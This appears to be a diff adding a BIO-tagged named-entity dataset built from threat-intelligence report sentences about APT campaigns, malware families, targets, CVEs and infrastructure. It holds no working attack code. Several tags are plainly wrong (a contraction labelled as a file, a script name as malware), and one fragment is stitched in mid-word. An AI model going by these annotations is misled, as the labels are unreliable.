+is O
+a O
+common O
+female O
+Persian O
+name O
+and O
+a O
+Persian-language O
+Word S-TOOL
+for O
+" O
+visage O
+" O
+or O
+" O
+appearance O
+" O
+. O
+Given O
+its O
+use O
+in O
+more O
+advanced O
+social B-IDTY
+engineering I-IDTY
+campaigns E-IDTY
+against O
+women B-IDTY
+'s I-IDTY
+rights I-IDTY
+activists E-IDTY
+, O
+the O
+label O
+seem O
+particularly O
+apt O
+. O
+
+Samples O
+and O
+resource O
+names O
+contained O
+the O
+family O
+names O
+of O
+prominent O
+Iranians S-IDTY
+, O
+and O
+several O
+of O
+these O
+individuals O
+received O
+the O
+malware O
+located O
+in O
+their O
+respective O
+folder O
+. O
+
+The O
+Sima S-APT
+group O
+also O
+engaged O
+in O
+impersonation O
+of O
+Citizenship S-IDTY
+and O
+Immigration B-IDTY
+Services E-IDTY
+at O
+the O
+Department B-SECTEAM
+of I-SECTEAM
+Homeland I-SECTEAM
+Security E-SECTEAM
+, O
+posing O
+as O
+a O
+notice O
+about O
+the O
+expiration O
+of O
+the O
+recipient O
+'s O
+Permanent O
+Residence O
+status O
+. O
+
+In O
+another O
+case O
+, O
+Sima S-APT
+mirrored O
+an O
+announcement O
+made O
+about O
+the O
+broadcast O
+of O
+a O
+television O
+program O
+on O
+Iranian-American O
+cultural O
+affairs O
+in O
+order O
+to O
+impersonate O
+the O
+individual O
+and O
+engage O
+in O
+spearphishing S-ACT
+within O
+hours O
+of O
+the O
+legitimate O
+message O
+. O
+
+The O
+server O
+used O
+to O
+host O
+these O
+malware O
+samples O
+was O
+located O
+on O
+the O
+German S-LOC
+provider S-IDTY
+Hetzner O
+( O
+148.251.55.114 O
+) O
+, O
+within O
+a O
+small O
+block O
+of O
+IP S-PROT
+addresses O
+that O
+are O
+registered O
+with O
+the O
+customer O
+ID O
+" O
+HOS-156205 O
+" O
+. O
+
+All O
+the O
+samples O
+appear O
+to O
+be O
+have O
+been O
+compiled O
+between O
+February B-TIME
+29 E-TIME
+and O
+March B-TIME
+1 I-TIME
+2016 E-TIME
+, O
+shortly O
+before O
+our O
+discovery O
+, O
+suggesting O
+that O
+, O
+despite O
+the O
+known O
+C&C S-TOOL
+servers O
+having O
+quickly O
+gone O
+offline O
+shortly O
+after O
+, O
+this O
+spree O
+of O
+attacks O
+might O
+be O
+fresh O
+and O
+currently O
+undergoing O
+. O
+
+These O
+archives O
+provide O
+further O
+indication O
+that O
+those O
+entities O
+behind O
+the O
+campaigns S-ACT
+are O
+Persian-language O
+speakers O
+, O
+due O
+to O
+the O
+naming O
+of O
+files O
+and O
+folders O
+in O
+Persian O
+. O
+
+For O
+the O
+sake O
+of O
+narrative O
+we O
+are O
+going O
+to O
+focus O
+exclusively O
+to O
+those O
+samples O
+we O
+identified O
+being O
+used O
+in O
+attacks O
+against O
+Iranian S-LOC
+civil B-IDTY
+society E-IDTY
+and O
+diaspora S-IDTY
+. O
+
+Butterfly S-APT
+has O
+attacked O
+multi-billion B-IDTY
+dollar I-IDTY
+companies E-IDTY
+operating O
+in O
+the O
+internet O
+, O
+IT O
+software O
+, O
+pharmaceutical S-IDTY
+, O
+and O
+commodities B-IDTY
+sectors E-IDTY
+. O
+
+The O
+first O
+signs O
+of O
+Butterfly O
+'s O
+activities S-ACT
+emerged O
+in O
+early B-TIME
+2013 E-TIME
+when O
+several O
+major O
+technology S-IDTY
+and O
+internet B-IDTY
+firms E-IDTY
+were O
+compromised O
+. O
+
+However O
+, O
+an O
+investigation O
+by O
+Symantec S-SECTEAM
+has O
+found O
+that O
+the O
+group O
+has O
+been O
+active O
+since O
+at O
+least O
+March S-TIME
+2012 S-TIME
+and O
+its O
+attacks O
+have O
+not O
+only O
+continued O
+to O
+the O
+present O
+day O
+, O
+but O
+have O
+also O
+increased O
+in O
+number O
+. O
+
+Symantec S-SECTEAM
+has O
+to O
+date O
+discovered O
+49 O
+different O
+organizations O
+in O
+more O
+than O
+20 O
+countries O
+that O
+have O
+been O
+attacked O
+by O
+Butterfly O
+. O
+
+Aside O
+from O
+the O
+four O
+companies O
+which O
+have O
+publicly O
+acknowledged O
+attacks O
+, O
+Symantec S-SECTEAM
+has O
+identified O
+five O
+other O
+large O
+technology B-IDTY
+firms E-IDTY
+compromised O
+by O
+Butterfly O
+, O
+primarily O
+headquartered O
+in O
+the O
+US S-LOC
+. O
+
+In O
+the O
+first O
+attack O
+, O
+Butterfly O
+gained O
+a O
+foothold O
+by O
+first O
+attacking O
+a O
+small O
+European O
+office O
+belonging O
+to O
+one O
+firm O
+and O
+using O
+this O
+infection O
+to O
+then O
+move O
+on O
+to O
+its O
+US O
+office O
+and O
+European S-LOC
+headquarters O
+. O
+
+However O
+, O
+technology S-IDTY
+is O
+not O
+the O
+only O
+sector O
+the O
+group O
+has O
+focused O
+on O
+and O
+Symantec S-SECTEAM
+has O
+found O
+evidence O
+that O
+Butterfly O
+has O
+attacked O
+three O
+major O
+European O
+pharmaceutical B-IDTY
+firms E-IDTY
+. O
+
+Butterfly S-APT
+has O
+also O
+shown O
+an O
+interest O
+in O
+the O
+commodities B-IDTY
+sector E-IDTY
+, O
+attacking O
+two O
+major O
+companies O
+involved O
+in O
+gold S-IDTY
+and O
+oil S-IDTY
+in O
+late O
+2014 S-TIME
+. O
+
+The O
+company O
+specializes O
+in O
+finance S-IDTY
+and O
+natural O
+resources O
+specific O
+to O
+that O
+region O
+. O
+
+The O
+latter O
+was O
+one O
+of O
+at O
+least O
+three O
+law B-IDTY
+firms E-IDTY
+Butterfly S-APT
+has O
+targeted O
+over O
+the O
+past O
+three O
+years O
+. O
+
+In O
+many O
+attacks O
+, O
+the O
+group O
+has O
+succeeded O
+in O
+compromising O
+Microsoft B-MAL
+Exchange E-MAL
+or O
+Lotus B-MAL
+Domino I-MAL
+email I-MAL
+servers E-MAL
+in O
+order O
+to O
+intercept O
+company O
+emails S-TOOL
+and O
+possibly O
+use O
+them O
+to O
+send O
+counterfeit O
+emails S-TOOL
+. O
+
+A O
+powerful O
+threat O
+actor O
+known O
+as O
+" O
+Wild O
+Neutron O
+" O
+( O
+also O
+known O
+as O
+" O
+Jripbot S-APT
+" O
+and O
+" O
+Morpho S-APT
+" O
+) O
+has O
+been O
+active O
+since O
+at O
+least O
+2011 S-TIME
+, O
+infecting O
+high B-IDTY
+profile I-IDTY
+companies E-IDTY
+for O
+several O
+years O
+by O
+using O
+a O
+combination O
+of O
+exploits O
+, O
+watering B-ACT
+holes E-ACT
+and O
+multi-platform O
+malware O
+. O
+
+Based O
+on O
+the O
+profile O
+of O
+the O
+victims O
+and O
+the O
+type O
+of O
+information O
+targeted O
+by O
+the O
+attackers O
+, O
+Symantec S-SECTEAM
+believes O
+that O
+Butterfly O
+is O
+financially O
+motivated O
+, O
+stealing O
+information O
+it O
+can O
+potentially O
+profit O
+from O
+. O
+
+Wild O
+Neutron O
+hit O
+the O
+spotlight O
+in O
+2013 S-TIME
+, O
+when O
+it O
+successfully O
+infected O
+companies O
+such O
+as O
+Apple S-IDTY
+, O
+Facebook S-IDTY
+, O
+Twitter S-IDTY
+and O
+Microsoft S-IDTY
+. O
+
+Wild B-APT
+Neutron E-APT
+'s O
+attacks O
+in O
+2015 S-TIME
+uses O
+a O
+stolen B-MAL
+code I-MAL
+signing I-MAL
+certificate E-MAL
+belonging O
+to O
+Taiwanese S-LOC
+electronics S-IDTY
+maker O
+Acer O
+and O
+an O
+unknown O
+Flash B-TOOL
+Player E-TOOL
+exploit S-VULNAME
+. O
+
+During O
+the O
+2013 B-ACT
+attacks E-ACT
+, O
+the O
+Wild O
+Neutron O
+actor O
+successfully O
+compromised O
+and O
+leveraged O
+the O
+website O
+www.iphonedevsdk.com O
+, O
+which O
+is O
+an O
+iPhone O
+developers O
+forum O
+. O
+
+Wild B-APT
+Neutron E-APT
+'s O
+attack O
+took O
+advantage O
+of O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+exploit S-VULNAME
+and O
+used O
+hacked O
+forums O
+as O
+watering B-ACT
+holes E-ACT
+. O
+
+While O
+the O
+group O
+used O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+in O
+2013 S-TIME
+, O
+it's O
+still O
+unclear O
+how O
+victims O
+get O
+redirected O
+to O
+the O
+exploitation O
+kits O
+in O
+the O
+new O
+2014-2015 B-ACT
+attacks E-ACT
+. O
+
+Wild B-APT
+Neutron E-APT
+'s O
+tools O
+include O
+a O
+password B-MAL
+harvesting I-MAL
+trojan E-MAL
+, O
+a O
+reverse-shell B-MAL
+backdoor E-MAL
+and O
+customized B-MAL
+implementations I-MAL
+of I-MAL
+OpenSSH E-MAL
+, O
+WMIC S-MAL
+and O
+SMB S-MAL
+. O
+
+Instead O
+of O
+Flash S-TOOL
+exploits S-VULNAME
+, O
+older O
+Wild O
+Neutron O
+exploitation O
+and O
+watering B-ACT
+holes E-ACT
+used O
+what O
+was O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+at O
+the O
+end B-TIME
+of I-TIME
+2012 E-TIME
+and O
+the O
+beginning B-TIME
+of I-TIME
+2013 E-TIME
+, O
+detected O
+by O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+products O
+as O
+Exploit.Java.CVE-2012-3213.b S-VULID
+. O
+
+The O
+victims O
+for O
+the O
+2014-2015 S-TIME
+versions O
+are O
+generally O
+IT S-IDTY
+and O
+real B-IDTY
+estate/investment I-IDTY
+companies E-IDTY
+and O
+in O
+both O
+cases O
+, O
+a O
+small O
+number O
+of O
+computers O
+have O
+been O
+infected O
+throughout O
+Wild B-APT
+Neutron E-APT
+. O
+
+Wild B-APT
+Neutron E-APT
+'s O
+targeting O
+of O
+major O
+IT B-IDTY
+companies E-IDTY
+, O
+spyware B-IDTY
+developers E-IDTY
+( O
+FlexiSPY S-IDTY
+) O
+, O
+jihadist B-IDTY
+forums E-IDTY
+( O
+the O
+" O
+Ansar B-IDTY
+Al-Mujahideen I-IDTY
+English I-IDTY
+Forum E-IDTY
+" O
+) O
+and O
+Bitcoin B-IDTY
+companies E-IDTY
+indicate O
+a O
+flexible O
+yet O
+unusual O
+mindset O
+and O
+interests O
+. O
+
+We O
+continue O
+to O
+track O
+the O
+Wild B-APT
+Neutron I-APT
+group E-APT
+, O
+which O
+is O
+still O
+active O
+as O
+of O
+June B-TIME
+2015 E-TIME
+. O
+
+A O
+ransomware O
+variant O
+dubbed O
+PyLocky S-MAL
+was O
+observed O
+in O
+September B-TIME
+2018 E-TIME
+being O
+distributed O
+by O
+a O
+phishing B-ACT
+campaign E-ACT
+using O
+an O
+invoicing O
+theme O
+. O
+
+PyLocky S-MAL
+was O
+found O
+to O
+be O
+targeting O
+entities O
+in O
+France S-LOC
+and O
+Germany S-LOC
+. O
+
+Fxmsp S-APT
+specialize O
+in O
+breaching O
+highly O
+secure O
+protected O
+networks O
+to O
+access O
+private O
+corporate O
+and O
+government O
+information O
+. O
+
+Fxmsp S-APT
+is O
+a O
+hacking O
+collective O
+that O
+has O
+operated O
+in O
+various O
+top-tier O
+Russian- O
+and O
+English-speaking O
+underground O
+communities O
+since O
+2017 S-TIME
+. O
+
+Throughout O
+2017 S-TIME
+and O
+2018 S-TIME
+, O
+Fxmsp S-APT
+established O
+a O
+network O
+of O
+trusted O
+proxy O
+resellers O
+to O
+promote O
+their O
+breaches O
+on O
+the O
+criminal O
+underground O
+. O
+
+On O
+April B-TIME
+24 E-TIME
+, O
+2019 S-TIME
+, O
+Fxmsp S-APT
+claimed O
+to O
+have O
+secured O
+access O
+to O
+three O
+leading O
+antivirus B-IDTY
+companies E-IDTY
+. O
+
+According O
+to O
+the O
+Fxmsp O
+, O
+they O
+worked O
+tirelessly O
+for O
+the O
+first O
+quarter O
+of O
+2019 S-TIME
+to O
+breach O
+these O
+companies O
+and O
+finally O
+succeeded O
+and O
+obtained O
+access O
+to O
+the O
+companies' O
+internal O
+networks O
+. O
+
+Booz B-SECTEAM
+Allen I-SECTEAM
+Hamilton E-SECTEAM
+in O
+2014 S-TIME
+and O
+AhnLab S-SECTEAM
+in O
+2015 S-TIME
+reported O
+on O
+Bisonal O
+using O
+a O
+simple O
+XOR O
+cipher O
+to O
+hide O
+the O
+C2 S-TOOL
+address O
+strings O
+in O
+the O
+body O
+. O
+For O
+example O
+, O
+Bisonal B-APT
+malware E-APT
+in O
+2012 S-TIME
+used O
+send() O
+and O
+recv() O
+APIs O
+to O
+communicate O
+with O
+its O
+C2. O
+This O
+Bisonal S-FILE
+variant O
+used O
+in O
+the O
+latest O
+attack O
+communicates O
+with O
+one O
+of O
+the O
+following O
+hard-coded O
+C2 S-TOOL
+addresses O
+by O
+using O
+the O
+HTTP B-ACT
+POST E-ACT
+method O
+on O
+TCP S-PROT
+PROT O
+443 O
+. O
+Previous O
+reports O
+have O
+discussed O
+Bisonal B-FILE
+malware E-FILE
+used O
+in O
+attacks O
+against O
+Japan S-LOC
+, O
+South B-LOC
+Korea E-LOC
+and O
+Russia S-LOC
+. O
+This O
+particular O
+sample S-FILE
+we O
+found O
+targeted O
+an O
+organization O
+in O
+Russia S-LOC
+and O
+there O
+is O
+a O
+specific O
+system O
+language O
+check O
+for O
+Cyrillic O
+and O
+no O
+others O
+. O
+If O
+it's S-FILE
+Cyrillic S-MAL
+and O
+the O
+command O
+to O
+the O
+shell O
+is O
+not O
+‘ipconfig’ O
+, O
+the O
+threat O
+converts O
+the O
+command O
+result O
+text O
+encoding O
+from O
+Cyrillic O
+to O
+UTF-16 S-MAL
+. O
+Similar O
+to O
+the O
+Bisonal S-FILE
+variant O
+targeting O
+the O
+Russian B-LOC
+organization E-LOC
+, O
+this O
+sample O
+was O
+also O
+disguised O
+as O
+PDF S-TOOL
+document O
+. O
+
+The O
+installed B-FILE
+EXE I-FILE
+file E-FILE
+is O
+almost O
+exactly O
+the O
+same O
+as O
+the O
+DLL S-TOOL
+version O
+of O
+Bisonal B-FILE
+variant E-FILE
+used O
+against O
+the O
+Russian S-LOC
+organization O
+. O
+The O
+targets O
+are O
+military O
+or O
+defense O
+industry O
+in O
+particular B-LOC
+countries E-LOC
+, O
+it O
+used O
+DDNS S-PROT
+for O
+C2 S-TOOL
+servers O
+, O
+and O
+tracked O
+connections O
+from O
+their O
+victims O
+by O
+using O
+target O
+or O
+campaign O
+codes O
+, O
+as O
+well O
+as O
+disguising O
+the O
+malware S-ACT
+as O
+document O
+file O
+, O
+and O
+using O
+a O
+dropper S-MAL
+to O
+install O
+the O
+malware O
+and O
+decoy O
+file O
+. O
+A O
+previous O
+campaign O
+of O
+this O
+APT O
+group O
+was O
+uncovered O
+by O
+Talos S-SECTEAM
+in O
+June B-TIME
+2017 E-TIME
+, O
+and O
+since O
+then O
+very O
+little O
+of O
+this O
+operation O
+was O
+seen O
+in O
+the O
+wild O
+. O
+ined O
+in O
+the O
+archive O
+is O
+called O
+DriverInstallerU.exe” S-FILE
+but O
+its O
+metadata O
+shows O
+that O
+its O
+original O
+name O
+is O
+Interenet B-FILE
+Assistant.exe” E-FILE
+. O
+After O
+reviewing O
+all O
+the O
+malware O
+functionalities O
+, O
+we O
+are O
+confident O
+in O
+saying O
+that O
+the O
+attackers S-APT
+look O
+for O
+victims B-IDTY
+who I-IDTY
+answer E-IDTY
+well-defined O
+characteristics O
+and O
+believe O
+that O
+further O
+stages O
+of O
+the O
+attack O
+are O
+delivered O
+only O
+to O
+those O
+who O
+fit O
+the O
+specific O
+victim O
+profile O
+. O
+In O
+this O
+sample O
+, O
+however O
+, O
+the O
+module O
+names O
+were O
+changed O
+from O
+actors O
+and O
+characters’ O
+names O
+to O
+car O
+models O
+, O
+namely O
+BMW_x1” S-FILE
+, O
+BMW_x2” S-FILE
+and O
+up O
+to O
+BMW_x8” S-FILE
+. O
+But O
+, O
+thanks O
+to O
+the O
+attackers S-APT
+known O
+affection O
+for O
+decoy O
+documents O
+that O
+pose O
+as O
+news O
+summaries O
+, O
+we O
+were O
+able O
+to O
+date O
+the O
+campaign O
+back O
+to O
+March B-TIME
+2018 E-TIME
+. O
+With O
+the O
+experience O
+gained O
+from O
+the O
+APT B-ACT
+attack E-ACT
+that O
+began O
+in O
+March B-TIME
+2017 E-TIME
+, O
+it O
+seems O
+this O
+campaign O
+has O
+evolved O
+into O
+an O
+attack O
+with O
+new O
+capabilities O
+, O
+and O
+an O
+even O
+more O
+specific O
+target O
+, O
+over O
+a O
+year O
+later O
+. O
+These O
+unknown B-APT
+actors E-APT
+continued O
+launching O
+DDoS S-ACT
+attacks O
+over O
+the O
+next O
+few O
+years O
+. O
+For O
+simplicity O
+, O
+Kaspersky S-SECTEAM
+is O
+calling O
+them O
+the O
+BlackEnergy E-APT
+APT O
+group O
+. O
+Since O
+the O
+middle B-TIME
+of I-TIME
+2015 E-TIME
+, O
+one O
+of O
+the O
+preferred O
+attack O
+vectors O
+for O
+BlackEnergy S-APT
+in O
+Ukraine S-LOC
+has O
+been O
+Excel O
+documents O
+with O
+macros O
+that O
+drop O
+the O
+Trojan S-MAL
+to O
+disk O
+if O
+the O
+user O
+chooses O
+to O
+run O
+the O
+script O
+in O
+the O
+document O
+. O
+A O
+very O
+good O
+analysis O
+and O
+overview O
+of O
+the O
+BlackEnergy O
+attacks O
+in O
+Ukraine O
+throughout O
+2014 S-TIME
+and O
+2015 S-TIME
+was O
+published O
+by O
+the O
+Ukrainian O
+security O
+firm O
+Cys B-SECTEAM
+Centrum E-SECTEAM
+the O
+text O
+is O
+only O
+available O
+in O
+Russian O
+for O
+now O
+, O
+but O
+can O
+be O
+read O
+via O
+Google O
+Translate O
+. O
+The O
+earliest O
+signs O
+of O
+destructive B-ACT
+payloads E-ACT
+with O
+BlackEnergy S-APT
+go O
+back O
+as O
+far O
+as O
+June B-TIME
+2014 E-TIME
+. O
+BlackEnergy S-APT
+is O
+a O
+highly O
+dynamic O
+threat O
+actor O
+and O
+the O
+current O
+attacks O
+in O
+Ukraine S-LOC
+indicate O
+that O
+destructive O
+actions O
+are O
+on O
+their O
+main O
+agenda O
+, O
+in O
+addition O
+to O
+compromising O
+industrial O
+control O
+installations O
+and O
+espionage O
+activities O
+. O
+Kaspersky S-SECTEAM
+will O
+continue O
+to O
+monitor O
+the O
+BlackEnergy S-APT
+attacks O
+in O
+Ukraine S-LOC
+and O
+update O
+our O
+readers O
+with O
+more O
+data O
+when O
+available O
+. O
+From O
+Buhtrap S-APT
+perpetrating O
+cybercrime O
+for O
+financial O
+gain O
+, O
+its O
+toolset O
+has O
+been O
+expanded O
+with O
+malware O
+used O
+to O
+conduct O
+espionage O
+in O
+Eastern B-LOC
+Europe E-LOC
+and O
+Central B-LOC
+Asia E-LOC
+. O
+Throughout O
+our O
+tracking O
+, O
+we've S-SECTEAM
+seen O
+this B-APT
+group E-APT
+deploy O
+its O
+main O
+backdoor S-ACT
+as O
+well O
+as O
+other O
+tools O
+against O
+various O
+victims O
+, O
+but O
+June B-TIME
+2019 E-TIME
+was O
+the O
+first O
+time O
+we O
+saw O
+the O
+Buhtrap S-APT
+group O
+use O
+a O
+zero-day B-ACT
+exploit E-ACT
+as O
+part O
+of O
+a O
+campaign O
+. O
+In O
+that O
+case O
+, O
+we O
+observed O
+Buhtrap S-APT
+using O
+a O
+local O
+privilege O
+escalation O
+exploit S-VULNAME
+, O
+CVE-2019-1132 S-VULID
+, O
+against O
+one O
+of O
+its O
+victims O
+. O
+However O
+, O
+as O
+the O
+shift O
+in O
+targets O
+occurred O
+before O
+the O
+source O
+code O
+leak O
+, O
+we O
+assess O
+with O
+high O
+confidence O
+that O
+the O
+same O
+people O
+behind O
+the O
+first O
+Buhtrap S-APT
+malware O
+attacks O
+against O
+businesses S-IDTY
+and O
+banks S-IDTY
+are O
+also O
+involved O
+in O
+targeting O
+governmental B-IDTY
+institutions E-IDTY
+. O
+When O
+Buhtrap S-APT
+was O
+targeting O
+businesses S-IDTY
+, O
+the O
+decoy O
+documents O
+would O
+typically O
+be O
+contracts O
+or O
+invoices O
+. O
+The O
+Buhtrap S-APT
+group O
+is O
+well O
+known O
+for O
+its O
+targeting O
+of O
+financial B-IDTY
+institutions E-IDTY
+and O
+businesses O
+in O
+Russia S-LOC
+. O
+Figure O
+2 O
+is O
+a O
+typical O
+example O
+of O
+a O
+generic O
+invoice O
+the O
+group O
+used O
+in O
+a O
+campaign O
+in O
+2014 S-TIME
+. O
+When O
+the O
+group's S-APT
+focus O
+shifted O
+to O
+banks O
+, O
+the O
+decoy O
+documents O
+were O
+related O
+to O
+banking O
+system O
+regulations O
+or O
+advisories O
+from O
+FinCERT S-SECTEAM
+, O
+an O
+organization O
+created O
+by O
+the O
+Russian O
+government O
+to O
+provide O
+help O
+and O
+guidance O
+to O
+its O
+financial O
+institutions O
+. O
+We O
+confirmed O
+that O
+this O
+is O
+a O
+DarkHydrus S-APT
+Group's O
+new O
+attack O
+targeting O
+Middle B-LOC
+East I-LOC
+region E-LOC
+. O
+In O
+July O
+2018 S-TIME
+, O
+Palo B-SECTEAM
+Alto E-SECTEAM
+disclosed O
+DarkHydrus S-APT
+Group O
+which O
+showed O
+its O
+special O
+interest O
+to O
+governments S-IDTY
+in O
+Middle B-LOC
+East E-LOC
+. O
+Prior O
+to O
+that O
+report O
+, O
+we O
+published O
+detail O
+analysis O
+on O
+malware O
+exploiting O
+CVE-2018-8414 S-VULID
+vulnerability O
+(remote O
+code O
+execution O
+in O
+SettingContent-ms) O
+, O
+which O
+is O
+believed O
+a O
+work O
+of O
+DarkHydrus S-APT
+. O
+However O
+, O
+the O
+final O
+payload O
+is O
+something O
+that O
+welivesecurity S-SECTEAM
+have O
+never O
+seen O
+associated O
+with O
+Buhtrap S-APT
+. O
+It's O
+coincident O
+that O
+both O
+'darkhydrus' S-APT
+APT O
+group O
+name O
+and O
+‘Williams’ S-APT
+user O
+name O
+in O
+PDB O
+path O
+found O
+in O
+this O
+Twitter B-IDTY
+user E-IDTY
+. O
+In O
+recent O
+APT O
+incidents O
+, O
+Dark B-APT
+Hydruns E-APT
+tend O
+to O
+adopt O
+Office B-MAL
+VBA I-MAL
+macro E-MAL
+instead O
+of O
+Office O
+0day O
+vulnerability O
+in O
+the O
+consideration O
+of O
+cost O
+reduction O
+. O
+ASERT S-SECTEAM
+uncovered O
+a O
+credential O
+theft O
+campaign O
+we O
+call O
+LUCKY B-APT
+ELEPHANT E-APT
+where O
+attackers B-ACT
+masquerade E-ACT
+as O
+legitimate O
+entities O
+such O
+as O
+foreign B-IDTY
+government E-IDTY
+, O
+telecommunications S-IDTY
+, O
+and O
+military S-IDTY
+. O
+From O
+at O
+least O
+February B-TIME
+2019 E-TIME
+to O
+present O
+, O
+the O
+actors O
+in O
+the O
+LUCKY B-APT
+ELEPHANT E-APT
+campaign O
+copied O
+webpages O
+to O
+mimic O
+South B-IDTY
+Asian I-IDTY
+government I-IDTY
+websites E-IDTY
+as O
+well O
+as O
+Microsoft B-IDTY
+Outlook E-IDTY
+365 O
+login O
+pages O
+and O
+hosted B-ACT
+them E-ACT
+on O
+their O
+own O
+doppelganger O
+domains O
+, O
+presumably O
+to O
+trick O
+victims O
+into O
+providing O
+login O
+credentials O
+. O
+ASERT S-SECTEAM
+suspects O
+that O
+the O
+Actors O
+use O
+phishing B-ACT
+emails S-TOOL
+to O
+lure O
+victims O
+to O
+the O
+doppelganger O
+websites O
+and O
+entice O
+users O
+to O
+enter O
+their O
+credentials O
+. O
+It O
+is O
+important O
+to O
+note O
+that O
+one O
+domain O
+, O
+yahoomail[.]cf O
+is O
+only O
+associated O
+with O
+this O
+group O
+from O
+February B-TIME
+2019 E-TIME
+onward O
+. O
+In O
+late O
+2018 S-TIME
+, O
+the O
+domain O
+was O
+associated O
+with O
+a O
+different O
+APT O
+group O
+/ O
+campaign O
+of O
+Chinese B-LOC
+origin E-LOC
+. O
+Based O
+on O
+our O
+analysis O
+into O
+the O
+activity O
+, O
+ASERT O
+deems O
+with O
+moderate O
+confidence O
+that O
+an O
+Indian B-APT
+APT I-APT
+group E-APT
+is O
+behind O
+the O
+LUCKY B-ACT
+ELEPHANT I-ACT
+campaign E-ACT
+. O
+The O
+targets O
+are O
+typical O
+of O
+known O
+Indian S-LOC
+APT O
+activity O
+and O
+the O
+infrastructure O
+was O
+previously O
+used O
+by O
+an O
+Indian O
+APT O
+group O
+. O
+DoNot B-APT
+Team E-APT
+has O
+a O
+history O
+of O
+heavily O
+targeting O
+Pakistan S-LOC
+, O
+in O
+addition O
+to O
+other O
+neighboring B-LOC
+countries E-LOC
+. O
+The O
+360 O
+Intelligence O
+Center O
+observed O
+four O
+distinct O
+campaigns O
+against O
+Pakistan S-LOC
+since O
+2017 O
+(link) O
+, O
+recently O
+targeting O
+Pakistani B-IDTY
+businessmen E-IDTY
+working O
+in O
+China O
+. O
+DoNot S-APT
+Team’s O
+confirmed O
+use O
+of O
+this O
+IP S-PROT
+dates O
+back O
+to O
+September B-TIME
+2018 E-TIME
+, O
+with O
+a O
+six-month S-TIME
+gap O
+until O
+it O
+was O
+used O
+to O
+host O
+doppelganger O
+domains O
+for O
+the O
+LUCKY B-ACT
+ELEPHANT E-ACT
+campaign O
+in O
+early O
+February S-TIME
+. O
+
+One O
+of O
+the O
+IP S-PROT
+addresses O
+, O
+128.127.105.13 S-IP
+, O
+was O
+previously O
+used O
+by O
+the O
+DoNot B-APT
+Team E-APT
+(aka O
+APT-C-35 S-APT
+) O
+, O
+a O
+suspected O
+Indian S-LOC
+APT O
+group O
+. O
+
+The O
+actors O
+behind O
+LUCKY B-APT
+ELEPHANT E-APT
+recognize O
+the O
+effectiveness O
+and O
+use O
+doppelganger B-MAL
+webpages E-MAL
+nearly O
+identical O
+to O
+legitimate O
+sites O
+, O
+enticing O
+users O
+to O
+input O
+their O
+credentials O
+. O
+The O
+heavier O
+targeting O
+in O
+Pakistan O
+adheres O
+to O
+historical O
+targeting O
+and O
+the O
+ongoing O
+tension O
+between O
+the O
+two O
+countries O
+, O
+which O
+has O
+escalated O
+since O
+a O
+terrorist B-ACT
+attack E-ACT
+in O
+Kashmir O
+on O
+14 B-TIME
+February I-TIME
+2019 E-TIME
+. O
+The O
+targeting O
+of O
+Pakistan S-LOC
+, O
+Bangladesh S-LOC
+, O
+Sri B-LOC
+Lanka E-LOC
+, O
+Maldives S-LOC
+, O
+Myanmar S-LOC
+, O
+Nepal S-LOC
+, O
+and O
+the O
+Shanghai B-IDTY
+Cooperation I-IDTY
+Organization E-IDTY
+are O
+all O
+historical O
+espionage S-ACT
+targets O
+by O
+India S-LOC
+. O
+However O
+, O
+it O
+is O
+clear O
+is O
+that O
+Donot S-APT
+are O
+actively O
+establishing O
+infrastructure O
+and O
+are O
+targeting O
+governments O
+in O
+South B-LOC
+Asia E-LOC
+. O
+First B-ACT
+attack E-ACT
+of O
+this O
+campaign O
+took O
+place O
+in O
+May B-TIME
+2018 E-TIME
+. O
+Arbor S-SECTEAM
+also O
+published O
+APT O
+research O
+on O
+this O
+group O
+, O
+and O
+named O
+it O
+‘Donot’ S-APT
+. O
+Donot S-APT
+attacked O
+government B-IDTY
+agencies E-IDTY
+, O
+aiming O
+for O
+classified O
+intelligence O
+. O
+We O
+identified O
+this O
+APT O
+group O
+coded O
+as O
+‘APT-C-35’ S-APT
+in O
+2017 O
+, O
+who O
+is O
+mainly O
+targeting O
+Pakistan S-LOC
+and O
+other O
+South B-LOC
+Asian E-LOC
+countries O
+for O
+Cyber B-ACT
+Espionage E-ACT
+. O
+At O
+least O
+4 O
+attack O
+campaigns O
+against O
+Pakistan O
+have O
+been O
+observed O
+by O
+us O
+since B-TIME
+2017 E-TIME
+. O
+Spear B-MAL
+phishing E-MAL
+emails S-TOOL
+with O
+vulnerable O
+Office O
+documents O
+or O
+malicious O
+macros O
+are O
+sent O
+to O
+victims O
+. O
+In O
+the O
+latest O
+attack O
+, O
+Donot B-APT
+group E-APT
+is O
+targeting O
+Pakistani B-IDTY
+businessman E-IDTY
+working O
+in O
+China S-LOC
+. O
+Two O
+unique O
+malware O
+frameworks O
+, O
+EHDevel S-MAL
+and O
+yty S-MAL
+, O
+are O
+developed O
+by O
+attackers S-APT
+. O
+wuaupdt.exe S-FILE
+is O
+a O
+CMD B-MAL
+backdoor E-MAL
+, O
+which O
+can O
+receive O
+and O
+execute O
+CMD O
+commands O
+sent O
+from O
+C2 S-TOOL
+. O
+Furthermore O
+, O
+it O
+has O
+similar O
+code O
+logic O
+as O
+previous O
+ones O
+wuaupdt.exe S-FILE
+in O
+this O
+attack O
+appears O
+in O
+previous O
+Donot O
+attack O
+, O
+and O
+C2 S-TOOL
+addresses O
+are O
+same O
+to O
+previous O
+ones O
+. O
+From O
+the O
+attack O
+activity O
+captured O
+this O
+time O
+, O
+it O
+is O
+obvious O
+that O
+Donot B-APT
+APT I-APT
+group E-APT
+is O
+still O
+keen O
+on O
+Pakistan S-LOC
+as O
+primary O
+target O
+of O
+attack O
+, O
+and O
+even O
+expands O
+scope O
+of O
+attack O
+to O
+include O
+Pakistani O
+staffs O
+and O
+institutions O
+in O
+China S-LOC
+. O
+Buhtrap S-APT
+still O
+make O
+extensive O
+use O
+of O
+NSIS B-APT
+installers E-APT
+as O
+droppers O
+and O
+these O
+are O
+mainly O
+delivered O
+through O
+malicious O
+documents O
+. O
+They O
+first O
+came O
+to O
+light O
+in O
+2016 S-TIME
+, O
+when O
+they O
+managed O
+to O
+steal O
+sensitive O
+information O
+from O
+the O
+US O
+Democratic O
+National O
+Committee O
+(DNC) S-IDTY
+. O
+Earworm S-APT
+first O
+came O
+to O
+light O
+in O
+2016 S-TIME
+, O
+when O
+they O
+managed O
+to O
+steal O
+sensitive O
+information O
+from O
+the O
+US O
+Democratic O
+National O
+Committee O
+(DNC) S-IDTY
+. O
+They S-APT
+were O
